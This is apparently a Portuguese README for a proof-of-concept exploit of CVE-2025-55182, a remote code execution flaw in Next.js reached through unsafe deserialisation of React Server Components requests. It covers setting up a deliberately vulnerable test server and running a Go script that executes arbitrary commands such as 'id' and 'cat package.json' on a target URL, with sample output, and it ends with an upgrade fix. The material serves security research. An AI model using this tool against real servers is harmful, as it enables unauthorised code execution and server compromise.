
Prova de conceito de exploit para CVE-2025-55182, uma vulnerabilidade de execução remota de código (RCE) no Next.js via desserialização insegura em requisições RSC. Inclui um script POC baseado em Go e um servidor de teste vulnerável para pesquisa e educação em segurança.
⚠️ Esta ferramenta é apenas para pesquisa de segurança e fins educacionais. Não a utilize para atividades ilegais. ⚠️
CVE-2025-55182 é uma vulnerabilidade crítica de execução remota de código (RCE) no framework Next.js. A vulnerabilidade decorre de um problema de desserialização insegura no Next.js ao processar requisições de React Server Components (RSC). Um atacante pode executar código arbitrário no servidor sem autorização, criando requisições HTTP maliciosas.
Versões Afetadas:
Este projeto fornece um servidor de teste Next.js vulnerável chamado test-server.
Certifique-se de que você tem Node.js e npm instalados.
cd test-server
npm install
npm run dev
O servidor é executado por padrão em http://localhost:3000.
Nota: Se encontrar um erro de arquivo lock, tente executar:
rm -f .next/dev/lock && npm run dev
Este projeto fornece um script POC em Go chamado poc.go.
Uso:
go run poc.go [URL alvo] [comando a executar]
Exemplos:
Executar comando id (padrão)
go run poc.go
ou
go run poc.go http://localhost:3000 id
Listar arquivos do diretório atual
go run poc.go http://localhost:3000 "ls -la"
Exibir conteúdo do arquivo
go run poc.go http://localhost:3000 "cat package.json"
Saída Esperada:
Embora o código de status HTTP retorne 500, o resultado da execução do comando estará incluído no campo digest da resposta.
1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}
Atualize o Next.js para uma versão segura:
npm install next@latest react@latest react-dom@latest